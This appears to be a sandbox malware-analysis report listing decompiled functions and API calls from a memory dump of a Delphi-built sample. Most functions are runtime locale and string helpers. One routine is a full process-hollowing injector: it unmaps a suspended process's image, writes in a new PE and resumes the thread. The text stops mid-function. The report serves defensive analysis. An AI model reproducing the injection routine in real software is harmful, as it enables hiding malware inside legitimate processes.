    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
    				char _v1032;
    				int _t13;
    				void* _t22;
    
    				_t21 = __edx;
    				if(__eax != 0) {
    					if( *(__eax + 4) >= 0x10000) {
    						return E00404080(__edx,  *(__eax + 4));
    					}
    					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
    					return E00403F78(_t21, _t13, _t22);
    				}
    				return __eax;
    			}







    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}









    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				CONTEXT* _v16;
    				void* _v20;
    				void _v24;
    				void _v28;
    				long _v32;
    				struct _PROCESS_INFORMATION _v48;
    				struct _STARTUPINFOA _v116;
    				CHAR* _t95;
    				short* _t171;
    				intOrPtr _t182;
    				intOrPtr _t189;
    				intOrPtr* _t194;
    				short* _t196;
    				void* _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr _t201;
    				void* _t215;
    
    				_t215 = __fp0;
    				_t199 = _t200;
    				_t201 = _t200 + 0xffffff90;
    				_t196 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t199);
    				_push(0x418218);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t201;
    				if(_v12 != 0) {
    					_push(0x418230);
    					_push(_v8);
    					_push(0x41823c);
    					_push(_v12);
    					E00404208();
    				}
    				 *_a4 = 0;
    				_t171 = _t196;
    				if( *_t171 == 0x5a4d) {
    					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
    					if( *_t194 == 0x4550) {
    						E00402B60( &_v116, 0x44);
    						E00402B60( &_v48, 0x10);
    						_v116.cb = 0x44;
    						_v116.dwFlags = 1;
    						_v116.wShowWindow = 0;
    						_t95 = E00404348(_v12);
    						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
    							 *_a4 = _v48.dwProcessId;
    							_v16 = E00417F28( &_v20);
    							if(_v16 != 0) {
    								_v16->ContextFlags = 0x10007;
    								if(GetThreadContext(_v48.hThread, _v16) != 0) {
    									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
    									if( *(_t194 + 0x34) != _v24) {
    										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    									} else {
    										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
    											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
    										} else {
    											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    										}
    									}
    									_t210 = _v28;
    									if(_v28 != 0) {
    										_t197 = E00417EA4(_t196, _t210);
    										_t125 = _v28;
    										if( *(_t194 + 0x34) != _v28) {
    											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
    											 *(_t194 + 0x34) = _v28;
    											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
    										}
    										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
    										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
    										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
    										SetThreadContext(_v48.hThread, _v16);
    										ResumeThread(_v48.hThread);
    										WaitForSingleObject(_v48.hThread, 0xffffffff);
    										_push(_t199);
    										_push(0x4181d0);
    										_push( *[fs:eax]);
    										 *[fs:eax] = _t201;
    										TerminateThread(_v48.hProcess, 0);
    										CloseHandle(_v48.hProcess);
    										_pop(_t189);
    										 *[fs:eax] = _t189;
    									}
    								}
    								VirtualFree(_v20, 0, 0x8000);
    							}
    							if( *_a4 == 0) {
    								TerminateProcess(_v48, 0);
    							}
    						}
    					}
    				}
    				_pop(_t182);
    				 *[fs:eax] = _t182;
    				_push(E0041821F);
    				return E00403EAC( &_v12, 2);
    			}
























    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAA _v334;
    				char _v595;
    				void* _t45;
    				char* _t54;
    				char* _t64;
    				void* _t83;
    				intOrPtr* _t84;
    				char* _t90;
    				struct HINSTANCE__* _t91;
    				char* _t93;
    				void* _t94;
    				char* _t95;
    				void* _t96;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t91 = GetModuleHandleA("kernel32.dll");
    				if(_t91 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t93 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_t95 = E00404DF4(_v8 + 2);
    							if( *_t95 != 0) {
    								_t14 = _t95 + 1; // 0x1
    								_t93 = E00404DF4(_t14);
    								if( *_t93 != 0) {
    									L10:
    									_t83 = _t93 - _v8;
    									_push(_t83 + 1);
    									_push(_v8);
    									_push( &_v595);
    									L00401248();
    									while( *_t93 != 0) {
    										_t90 = E00404DF4(_t93 + 1);
    										_t45 = _t90 - _t93;
    										if(_t45 + _t83 + 1 <= 0x105) {
    											_push(_t45 + 1);
    											_push(_t93);
    											_push( &(( &_v595)[_t83]));
    											L00401248();
    											_t94 = FindFirstFileA( &_v595,  &_v334);
    											if(_t94 != 0xffffffff) {
    												FindClose(_t94);
    												_t54 =  &(_v334.cFileName);
    												_push(_t54);
    												L00401250();
    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
    													_push(0x105 - _t83 - 1);
    													_push( &(_v334.cFileName));
    													_push( &(( &(( &_v595)[_t83]))[1]));
    													L00401248();
    													_t64 =  &(_v334.cFileName);
    													_push(_t64);
    													L00401250();
    													_t83 = _t83 + _t64 + 1;
    													_t93 = _t90;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v595);
    									_push(_v8);
    									L00401248();
    								}
    							}
    						}
    					}
    				} else {
    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
    					if(_t84 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v595);
    						_push(_v8);
    						if( *_t84() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v595);
    							_push(_v8);
    							L00401248();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}




















    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40b318);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E004040F8( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00407174(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040B31F);
    				return E00403E88( &_v16);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00403EDC(_t10, _t18);
    				}
    				return E00403F78(_t10, _t5 - 1,  &_v260);
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00417A70() {
    
    				if( *0x454a18 == 0) {
    					 *0x454a18 = GetModuleHandleA("kernel32.dll");
    					if( *0x454a18 != 0) {
    						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
    						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
    						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
    						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
    						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
    						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
    						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
    						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
    						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
    						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
    						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
    						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
    						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
    						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
    						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
    						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
    					}
    				}
    				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}




    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040CA40() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
    				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
    				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
    				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
    				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
    				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
    				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
    				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
    				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
    				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
    				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
    				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
    				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
    				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
    				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
    				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
    				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
    				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
    				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
    				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
    				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
    				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
    				 *0x4547f4 = _t46;
    				return _t46;
    			}






    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
    				char _t5;
    				char _t6;
    				CHAR* _t7;
    				char _t9;
